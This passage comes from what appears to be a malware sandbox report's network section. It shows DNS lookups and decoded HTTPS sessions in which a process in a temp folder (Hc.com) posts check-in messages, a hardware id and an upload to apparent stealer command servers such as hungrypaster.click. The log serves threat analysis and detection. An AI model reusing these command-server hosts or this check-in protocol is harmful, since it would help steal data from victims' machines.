                                                                                                                                                                      Dec 24, 2024 01:34:18.541222095 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.541229010 CET44349751104.21.84.113192.168.2.4

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 24, 2024 01:33:28.740255117 CET5477653192.168.2.41.1.1.1
                                                                                                                                                                      Dec 24, 2024 01:33:28.954544067 CET53547761.1.1.1192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:53.542830944 CET6496453192.168.2.41.1.1.1
                                                                                                                                                                      Dec 24, 2024 01:33:53.797873974 CET53649641.1.1.1192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.620290995 CET5917153192.168.2.41.1.1.1
                                                                                                                                                                      Dec 24, 2024 01:34:11.835616112 CET53591711.1.1.1192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.652148962 CET6212453192.168.2.41.1.1.1
                                                                                                                                                                      Dec 24, 2024 01:34:16.881505966 CET53621241.1.1.1192.168.2.4

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 24, 2024 01:33:28.740255117 CET192.168.2.41.1.1.10x15dbStandard query (0)PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSAA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:33:53.542830944 CET192.168.2.41.1.1.10xf2c3Standard query (0)hungrypaster.clickA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:11.620290995 CET192.168.2.41.1.1.10x765eStandard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:16.652148962 CET192.168.2.41.1.1.10x21e4Standard query (0)kliptizq.shopA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 24, 2024 01:33:28.954544067 CET1.1.1.1192.168.2.40x15dbName error (3)PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSAnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:33:53.797873974 CET1.1.1.1192.168.2.40xf2c3No error (0)hungrypaster.click188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:33:53.797873974 CET1.1.1.1192.168.2.40xf2c3No error (0)hungrypaster.click188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:11.835616112 CET1.1.1.1192.168.2.40x765eNo error (0)neqi.shop172.67.169.205A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:11.835616112 CET1.1.1.1192.168.2.40x765eNo error (0)neqi.shop104.21.27.229A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:16.881505966 CET1.1.1.1192.168.2.40x21e4No error (0)kliptizq.shop104.21.84.113A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 24, 2024 01:34:16.881505966 CET1.1.1.1192.168.2.40x21e4No error (0)kliptizq.shop172.67.191.144A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • hungrypaster.click
                                                                                                                                                                      • neqi.shop
                                                                                                                                                                      • kliptizq.shop

                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.449742188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:33:55 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:33:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                      2024-12-24 00:33:56 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:33:55 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=ik1k4v5jhkr6l1he5notcfkg8p; expires=Fri, 18 Apr 2025 18:20:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7ereWxw32eFyXUK9hhLRsRbknk6Fqv%2Fn9ZNFGFfAZQAx03%2B3AM1j%2BNkCML0m2bIzWu916qgDcs14odtja9v9mOQSdNfIvgRPpS1tZK7zCaO3ZhQdT2z3CfSKJvjYUC849km52g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80b0ee748c8a-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1980&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1435594&cwnd=248&unsent_bytes=0&cid=d6bb22e8317d7418&ts=1037&x=0"
                                                                                                                                                                      2024-12-24 00:33:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                      2024-12-24 00:33:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449743188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:33:57 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 77
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:33:57 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                                      2024-12-24 00:33:58 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:33:57 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=4165ko0r0m4pp1750u9v1713lk; expires=Fri, 18 Apr 2025 18:20:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lfexOpZfqExJzPHddtEbA4B1ouAJ25RWPW2TOE1ZQSW2pUR3IJyTJoZGcxNVCVbM3o5XsHgRMLVypQNFKDyYlEszAbb%2FrpU26yc2Z2%2B6caN4O%2FNrdAzOVf6EIzKpaHSd2cEpC9Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80befafe4396-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1565&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1784841&cwnd=252&unsent_bytes=0&cid=4854a811246fc56c&ts=767&x=0"
                                                                                                                                                                      2024-12-24 00:33:58 UTC242INData Raw: 33 61 38 38 0d 0a 6c 59 69 72 2b 72 2b 30 4c 54 75 37 6d 6d 4c 4b 62 78 33 34 74 6c 72 4d 69 58 66 63 54 4e 39 68 57 54 4f 4c 6e 50 5a 37 4f 6b 50 75 71 74 33 59 68 59 41 42 47 63 6a 2f 51 50 41 4a 66 4a 54 46 50 2b 43 72 46 72 68 75 35 51 63 34 58 2f 6a 35 32 6c 6c 4d 4c 72 65 79 7a 5a 76 54 78 30 67 58 6d 66 38 61 36 46 56 47 67 35 51 2f 6f 71 74 4e 2f 69 6d 31 41 7a 68 66 36 66 32 64 46 45 6f 76 39 75 44 48 6e 64 66 52 54 6c 2f 61 39 67 2b 76 43 6e 69 5a 33 44 53 6c 35 42 2b 78 62 76 4e 44 50 45 6d 70 70 74 51 32 58 7a 66 30 78 63 71 4a 31 4a 5a 51 46 38 43 34 42 36 52 4e 4a 39 72 58 50 36 37 6c 45 62 67 6e 74 77 6b 78 56 2b 6a 34 6e 41 74 54 4a 66 33 67 79 5a 37 57 32 30 64 4c 31 2f 77 49 70 41 78 79 6d 5a 52 32
                                                                                                                                                                      Data Ascii: 3a88lYir+r+0LTu7mmLKbx34tlrMiXfcTN9hWTOLnPZ7OkPuqt3YhYABGcj/QPAJfJTFP+CrFrhu5Qc4X/j52llMLreyzZvTx0gXmf8a6FVGg5Q/oqtN/im1Azhf6f2dFEov9uDHndfRTl/a9g+vCniZ3DSl5B+xbvNDPEmpptQ2Xzf0xcqJ1JZQF8C4B6RNJ9rXP67lEbgntwkxV+j4nAtTJf3gyZ7W20dL1/wIpAxymZR2
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 37 75 77 4e 2f 6e 62 39 55 41 6c 53 2b 4f 2b 42 46 45 67 6e 74 2f 57 48 67 5a 33 52 51 78 6d 42 75 41 69 6b 41 33 71 5a 32 7a 2b 76 36 77 65 78 4c 72 34 4c 4d 31 58 6a 38 5a 73 57 56 69 76 77 34 73 43 66 30 74 46 48 58 39 62 37 51 4f 5a 4e 65 49 4b 55 59 4f 37 4c 42 62 30 74 71 51 34 71 45 66 61 77 6a 56 6c 66 4c 62 65 79 69 5a 37 54 31 30 4a 5a 79 2f 41 4c 6f 77 68 74 6b 64 30 31 6f 2b 73 59 74 43 47 2b 41 7a 78 62 34 2f 47 65 48 56 55 73 38 65 72 4a 32 4a 4f 57 53 45 47 5a 6f 45 43 4c 43 47 2b 64 32 43 37 73 30 56 57 68 59 4b 52 44 50 46 32 70 70 74 51 52 58 53 4c 30 34 63 61 62 31 64 31 64 57 63 76 2b 44 61 30 66 65 5a 2f 61 4d 71 33 35 48 37 41 6f 76 67 6f 77 57 4f 7a 35 6b 46 6b 57 59 66 44 79 69 63 43 64 39 30 4a 53 31 66 49 58 71 45 31 67 31 4d 31
                                                                                                                                                                      Data Ascii: 7uwN/nb9UAlS+O+BFEgnt/WHgZ3RQxmBuAikA3qZ2z+v6wexLr4LM1Xj8ZsWVivw4sCf0tFHX9b7QOZNeIKUYO7LBb0tqQ4qEfawjVlfLbeyiZ7T10JZy/ALowhtkd01o+sYtCG+Azxb4/GeHVUs8erJ2JOWSEGZoECLCG+d2C7s0VWhYKRDPF2pptQRXSL04cab1d1dWcv+Da0feZ/aMq35H7AovgowWOz5kFkWYfDyicCd90JS1fIXqE1g1M1
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 62 51 6f 73 67 34 33 45 61 65 2b 6b 77 45 59 65 62 66 41 79 6f 7a 65 33 41 31 73 32 76 59 4f 72 78 73 2f 68 5a 6f 68 37 75 77 5a 2f 6e 62 39 44 6a 70 5a 37 2b 79 62 46 46 73 76 2b 65 58 4d 6c 39 58 57 54 31 54 63 2f 41 75 6a 44 6e 4b 65 78 6a 4b 75 34 78 43 2f 4a 4c 64 44 64 52 48 75 35 74 52 42 47 42 44 67 34 59 75 74 33 74 68 42 58 73 2b 34 48 2b 59 55 50 35 33 59 65 50 61 72 47 4c 59 72 75 41 77 36 57 2b 66 37 6e 68 56 51 4c 2f 54 34 78 70 7a 64 32 6b 64 54 31 50 59 45 6f 41 52 30 6b 64 49 34 72 2b 46 56 38 47 36 36 47 33 73 4a 71 63 71 54 46 56 55 75 74 64 2f 4b 6c 74 50 52 57 52 6e 47 74 68 6e 6f 43 6e 50 61 6a 48 69 69 34 68 57 31 4a 4c 6b 44 50 46 7a 73 2f 5a 4d 61 56 53 62 39 35 4d 36 63 30 64 39 43 58 39 6e 2f 42 4b 30 66 65 70 50 59 4e 4f 36 6c
                                                                                                                                                                      Data Ascii: bQosg43Eae+kwEYebfAyoze3A1s2vYOrxs/hZoh7uwZ/nb9DjpZ7+ybFFsv+eXMl9XWT1Tc/AujDnKexjKu4xC/JLdDdRHu5tRBGBDg4Yut3thBXs+4H+YUP53YeParGLYruAw6W+f7nhVQL/T4xpzd2kdT1PYEoAR0kdI4r+FV8G66G3sJqcqTFVUutd/KltPRWRnGthnoCnPajHii4hW1JLkDPFzs/ZMaVSb95M6c0d9CX9n/BK0fepPYNO6l
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 4a 4e 49 68 48 75 38 74 52 42 47 43 6a 2b 2b 4d 65 57 31 4e 74 4a 55 64 37 32 44 61 4d 4c 64 4a 33 54 50 71 50 6a 47 4c 73 74 76 41 63 78 51 2b 72 31 6e 68 52 53 59 62 6d 71 7a 6f 43 64 6a 67 39 2b 31 64 45 51 73 78 39 70 32 73 74 32 74 36 73 53 73 6d 37 6c 51 7a 68 65 34 50 47 63 45 56 63 75 38 2b 54 50 6e 74 44 54 51 46 50 4c 38 41 36 6c 42 6e 43 52 78 6a 69 6a 37 78 6d 36 4a 72 59 4a 65 78 2b 70 2b 59 78 5a 41 47 48 43 35 38 61 59 33 73 41 50 52 70 66 68 51 4b 38 42 50 38 4b 55 4e 4b 44 72 47 72 49 69 74 67 73 36 58 65 66 35 6b 52 42 51 4b 65 58 72 7a 5a 44 63 32 45 42 59 33 66 30 46 72 41 70 37 6e 4e 74 34 34 4b 73 53 70 6d 37 6c 51 78 52 32 33 4c 79 31 49 78 67 2b 75 66 4f 4a 6e 39 47 57 46 78 6e 56 2b 77 79 67 41 6e 6d 54 32 44 4b 6e 34 42 6d 31 4b
                                                                                                                                                                      Data Ascii: JNIhHu8tRBGCj++MeW1NtJUd72DaMLdJ3TPqPjGLstvAcxQ+r1nhRSYbmqzoCdjg9+1dEQsx9p2st2t6sSsm7lQzhe4PGcEVcu8+TPntDTQFPL8A6lBnCRxjij7xm6JrYJex+p+YxZAGHC58aY3sAPRpfhQK8BP8KUNKDrGrIitgs6Xef5kRBQKeXrzZDc2EBY3f0FrAp7nNt44KsSpm7lQxR23Ly1Ixg+ufOJn9GWFxnV+wygAnmT2DKn4Bm1K
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 55 35 76 2b 56 48 30 6f 6d 2f 76 6a 48 6c 64 4c 65 52 31 44 59 2f 41 57 6c 43 33 4f 51 31 54 2b 67 35 52 33 2b 59 50 30 45 49 78 47 78 76 72 55 4a 51 7a 50 68 35 2b 69 56 30 70 5a 51 46 38 43 34 42 36 52 4e 4a 39 72 64 4b 71 72 6d 42 37 63 70 73 77 77 34 51 2b 6a 7a 6e 77 74 66 4c 76 50 74 78 5a 37 53 30 45 35 63 30 2f 51 48 72 51 5a 77 6c 70 52 32 37 75 77 4e 2f 6e 62 39 4c 54 42 43 2f 76 32 61 45 6b 34 36 74 2f 57 48 67 5a 33 52 51 78 6d 42 75 41 4f 6a 42 6e 75 61 32 44 69 71 35 68 57 73 49 62 6f 45 4d 6c 72 37 39 4a 4d 65 55 79 6e 38 35 63 2b 4b 30 64 68 64 58 4d 76 71 51 4f 5a 4e 65 49 4b 55 59 4f 37 64 45 71 34 2b 76 6b 45 4b 52 2b 72 6f 6e 78 52 55 59 65 69 6b 30 4e 6a 61 32 67 38 42 6d 66 34 50 6f 51 35 77 6d 39 30 30 6f 2b 34 63 75 79 2b 37 42 7a
                                                                                                                                                                      Data Ascii: U5v+VH0om/vjHldLeR1DY/AWlC3OQ1T+g5R3+YP0EIxGxvrUJQzPh5+iV0pZQF8C4B6RNJ9rdKqrmB7cpsww4Q+jznwtfLvPtxZ7S0E5c0/QHrQZwlpR27uwN/nb9LTBC/v2aEk46t/WHgZ3RQxmBuAOjBnua2Diq5hWsIboEMlr79JMeUyn85c+K0dhdXMvqQOZNeIKUYO7dEq4+vkEKR+ronxRUYeik0Nja2g8Bmf4PoQ5wm900o+4cuy+7Bz
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 6a 31 6c 48 62 2b 36 71 7a 70 53 64 6a 67 39 61 33 76 73 42 6f 67 52 7a 6c 64 4d 38 76 4f 45 53 72 43 2b 38 43 44 5a 64 36 66 4f 5a 45 31 6b 6f 2b 75 62 45 6e 39 72 5a 53 68 6d 58 75 41 65 77 54 53 66 61 39 54 57 6c 35 30 37 6b 62 71 4a 4e 49 68 48 75 38 74 52 42 47 43 48 39 37 38 4f 56 33 74 6c 4d 53 39 6a 2b 45 71 67 41 64 59 6a 65 4d 36 76 6d 47 4c 4d 74 75 77 55 77 58 66 76 33 6c 42 70 54 59 62 6d 71 7a 6f 43 64 6a 67 39 36 7a 75 34 4b 72 77 46 70 6b 64 55 37 75 4f 59 46 2f 6d 44 39 45 6a 78 41 71 61 61 43 43 55 38 6d 36 4b 54 51 32 4e 72 61 44 77 47 5a 2f 67 6d 75 43 6e 6d 55 78 6a 32 6f 35 42 71 33 4a 37 6b 4c 4f 46 48 74 2b 70 4d 63 57 79 33 38 37 63 71 58 32 64 39 42 55 4e 61 34 54 75 67 4b 5a 39 71 4d 65 49 2f 77 46 72 49 6a 2f 52 78 31 53 4b 6e
                                                                                                                                                                      Data Ascii: j1lHb+6qzpSdjg9a3vsBogRzldM8vOESrC+8CDZd6fOZE1ko+ubEn9rZShmXuAewTSfa9TWl507kbqJNIhHu8tRBGCH978OV3tlMS9j+EqgAdYjeM6vmGLMtuwUwXfv3lBpTYbmqzoCdjg96zu4KrwFpkdU7uOYF/mD9EjxAqaaCCU8m6KTQ2NraDwGZ/gmuCnmUxj2o5Bq3J7kLOFHt+pMcWy387cqX2d9BUNa4TugKZ9qMeI/wFrIj/Rx1SKn
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 7a 6d 33 73 6f 6d 34 31 73 42 4b 58 73 2b 36 4e 61 73 44 63 5a 33 43 65 4c 48 55 57 2f 34 76 2f 56 73 43 53 4b 6e 6f 31 45 45 4b 62 37 66 34 69 63 43 64 6b 55 78 4c 79 2f 34 44 76 67 34 34 70 4f 6f 66 75 4f 45 53 72 69 6d 71 44 48 73 66 71 66 48 55 51 57 46 68 2f 75 33 53 69 63 76 62 58 31 36 5a 78 30 37 6f 46 54 2f 43 6c 41 32 74 35 52 75 35 4f 4b 78 4f 48 45 66 6a 2b 59 51 65 54 79 36 33 70 49 6d 65 6e 59 34 63 46 35 6e 38 45 65 68 56 4c 38 69 50 62 66 32 38 52 65 77 78 38 78 70 37 52 36 6d 6d 78 6c 63 59 4d 37 65 79 69 64 2f 65 78 46 31 66 32 75 34 44 37 7a 4e 42 76 63 34 31 71 50 77 45 67 42 43 36 47 54 5a 58 2f 75 2f 59 44 46 73 76 2b 65 33 66 32 4a 4f 57 51 42 6d 42 77 55 44 67 54 55 44 55 6c 43 44 75 73 31 57 4c 4c 62 4d 4e 50 45 66 34 73 37 4d 44
                                                                                                                                                                      Data Ascii: zm3som41sBKXs+6NasDcZ3CeLHUW/4v/VsCSKno1EEKb7f4icCdkUxLy/4Dvg44pOofuOESrimqDHsfqfHUQWFh/u3SicvbX16Zx07oFT/ClA2t5Ru5OKxOHEfj+YQeTy63pImenY4cF5n8EehVL8iPbf28Rewx8xp7R6mmxlcYM7eyid/exF1f2u4D7zNBvc41qPwEgBC6GTZX/u/YDFsv+e3f2JOWQBmBwUDgTUDUlCDus1WLLbMNPEf4s7MD
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 72 62 32 49 57 57 43 46 72 4c 36 67 61 72 47 33 7a 64 36 67 61 4a 35 52 4b 2f 4f 4b 30 55 4e 47 2f 58 36 35 63 58 56 69 62 68 2b 34 6e 57 6e 64 6b 50 41 65 43 34 53 4f 67 79 4d 64 72 4d 65 50 61 72 49 4c 30 67 73 77 51 74 51 4b 54 5a 6d 68 35 5a 4e 2b 66 39 78 74 69 54 6c 6b 6b 5a 67 61 70 4f 36 41 6c 75 32 6f 78 6f 2f 4c 42 41 37 58 6e 74 55 53 51 66 38 4c 36 43 57 51 42 7a 75 61 72 62 32 49 57 57 43 46 72 4c 36 67 61 72 47 33 7a 64 36 67 61 4a 35 52 4b 2f 4f 4b 30 55 4e 42 37 48 79 4c 55 6e 5a 6a 54 30 35 4d 65 66 79 38 63 50 46 35 6e 33 51 50 41 30 50 39 4b 55 42 2b 43 72 44 66 35 32 2f 54 59 34 58 2b 66 35 67 67 67 56 42 76 6e 74 79 49 37 4e 77 55 41 57 39 38 34 68 36 45 4d 2f 6e 4a 52 67 2f 4b 56 56 75 6a 2f 39 57 32 73 44 73 71 76 48 54 67 68 7a 36
                                                                                                                                                                      Data Ascii: rb2IWWCFrL6garG3zd6gaJ5RK/OK0UNG/X65cXVibh+4nWndkPAeC4SOgyMdrMeParIL0gswQtQKTZmh5ZN+f9xtiTlkkZgapO6Alu2oxo/LBA7XntUSQf8L6CWQBzuarb2IWWCFrL6garG3zd6gaJ5RK/OK0UNB7HyLUnZjT05Mefy8cPF5n3QPA0P9KUB+CrDf52/TY4X+f5gggVBvntyI7NwUAW984h6EM/nJRg/KVVuj/9W2sDsqvHTghz6
                                                                                                                                                                      2024-12-24 00:33:58 UTC1369INData Raw: 46 6c 68 63 5a 39 4f 6f 48 75 41 34 2f 31 4a 51 30 37 72 4e 56 73 7a 79 36 45 7a 67 64 37 75 53 54 57 55 64 76 37 71 72 66 32 49 57 46 41 52 6e 4c 75 46 6a 6f 53 6e 47 58 31 54 75 67 36 41 65 73 4b 4c 34 56 4f 42 62 58 77 4c 6b 4c 58 7a 48 30 71 50 69 56 32 63 42 61 57 73 6e 2f 50 70 59 67 62 5a 33 45 4f 2b 7a 48 45 72 4d 69 67 7a 30 4d 51 4f 37 75 31 6a 39 62 4e 2f 53 71 68 39 6a 46 6c 68 63 5a 39 4f 6f 48 75 41 34 39 74 74 4d 31 6f 71 73 4b 38 44 66 39 46 58 73 4a 75 72 44 55 43 78 68 35 74 36 33 4b 69 73 2f 51 54 45 2f 61 76 7a 36 57 49 47 32 64 78 44 76 73 32 68 69 36 4f 4b 67 41 4b 31 62 58 77 4c 6b 4c 58 7a 48 30 71 4f 79 69 6e 2b 64 5a 57 74 6e 32 42 2b 68 44 50 34 4b 55 59 4f 37 47 42 37 6b 2b 76 6b 45 65 61 36 76 50 67 68 70 59 4c 2f 43 71 68 39
                                                                                                                                                                      Data Ascii: FlhcZ9OoHuA4/1JQ07rNVszy6Ezgd7uSTWUdv7qrf2IWFARnLuFjoSnGX1Tug6AesKL4VOBbXwLkLXzH0qPiV2cBaWsn/PpYgbZ3EO+zHErMigz0MQO7u1j9bN/Sqh9jFlhcZ9OoHuA49ttM1oqsK8Df9FXsJurDUCxh5t63Kis/QTE/avz6WIG2dxDvs2hi6OKgAK1bXwLkLXzH0qOyin+dZWtn2B+hDP4KUYO7GB7k+vkEea6vPghpYL/Cqh9


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449744188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:33:59 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=TIISHQNJAG16259AJ
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 18155
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:33:59 UTC15331OUTData Raw: 2d 2d 54 49 49 53 48 51 4e 4a 41 47 31 36 32 35 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 54 49 49 53 48 51 4e 4a 41 47 31 36 32 35 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 49 49 53 48 51 4e 4a 41 47 31 36 32 35 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 54
                                                                                                                                                                      Data Ascii: --TIISHQNJAG16259AJContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--TIISHQNJAG16259AJContent-Disposition: form-data; name="pid"2--TIISHQNJAG16259AJContent-Disposition: form-data; name="lid"hRjzG3--GAS--T
                                                                                                                                                                      2024-12-24 00:33:59 UTC2824OUTData Raw: c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da
                                                                                                                                                                      Data Ascii: JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                      2024-12-24 00:34:00 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=0tkst3t2mvvhi1thmb7q6a8uj1; expires=Fri, 18 Apr 2025 18:20:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
